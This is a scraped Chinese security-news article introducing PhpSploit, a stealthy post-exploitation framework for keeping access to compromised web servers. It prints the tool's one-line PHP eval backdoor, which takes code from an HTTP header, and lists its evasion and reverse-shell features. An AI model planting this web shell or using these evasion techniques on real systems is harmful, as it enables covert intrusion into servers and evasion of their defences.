47

PhpSploit:一款隐蔽性极强的后渗透利用框架

 7 years ago
source link: http://www.freebuf.com/sectool/160132.html?amp%3Butm_medium=referral
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

PhpSploit:一款隐蔽性极强的后渗透利用框架 - FreeBuf网络安全行业门户user形状结合怀旧限时体验热度Fill 3编组备份 4APP库新版icon/epubicon/docicon/mp3icon/mp4icon/pdficon/ppticon/raricon/txticon/xlsFill 6网页灯泡形状结合形状结合小蜜蜂

主站
漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全
头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆
试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
PhpSploit:一款隐蔽性极强的后渗透利用框架
PhpSploit:一款隐蔽性极强的后渗透利用框架
Alpha_h4ck 2018-01-19 15:00:03 605568 8
1.png

今天给大家介绍的是一款名叫PhpSploit的远程控制框架,该工具可以帮助攻击者在客户端与Web服务器端之间建立隐蔽性极强的交互式链接(类似Shell)。简而言之,这是一款后渗透利用工具,它能够让攻击者与目标主机(例如被入侵的Web服务器)维持访问链接,并实现提权操作。

2.png

该工具会对标准客户端请求以及Web服务器相关请求的HTTP头数据进行混淆处理,并利用一个小型的多态后门来实现隐蔽通信:

<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

1.   提供了超过20款自动化后渗透利用工具;

2.   运行命令、浏览文件系统、绕过PHP安全限制;

3.   在目标客户端与攻击者端之间实现文件的上传和下载;

4.   通过本地文本编辑器编辑远程文件;

5.   在目标系统中运行SQL语句;

6.   生成反向TCP Shell;

隐蔽性强:

1.   专为偏执狂设计;

2.   日志分析以及NIDS签名检测机制几乎无法检测到它;

3.   绕过安全模式以及常见PHP安全限制;

4.   通信信息隐藏在HTTP头中;

5.   加载的Payload经过了混淆处理以绕过NIDS;

6.   支持http/https/socks4/socks5代理;

使用便捷:

1.   跨平台;

2.   强大的界面,完整的命令支持;

3.   提供了会话保存/加载功能;

4.   支持大型Payload,支持多重请求;

5.   提供了强大的、高度可配置的设置引擎;

6.   每一个设置(例如用户代理)都有多态模式;

7.   提供了完整的插件开发API;

支持的平台(攻击者端)

1.   GNU/Linux

2.   MacOS X

支持的平台(目标用户端)

1.   GNU/Linux

2.   BSDLike

3.   MacOS X

4.   WindowsNT

GitHub传送门

* 参考来源:n0where,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

本文作者:Alpha_h4ck, 转载请注明来自FreeBuf.COM

# Phpsploit

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK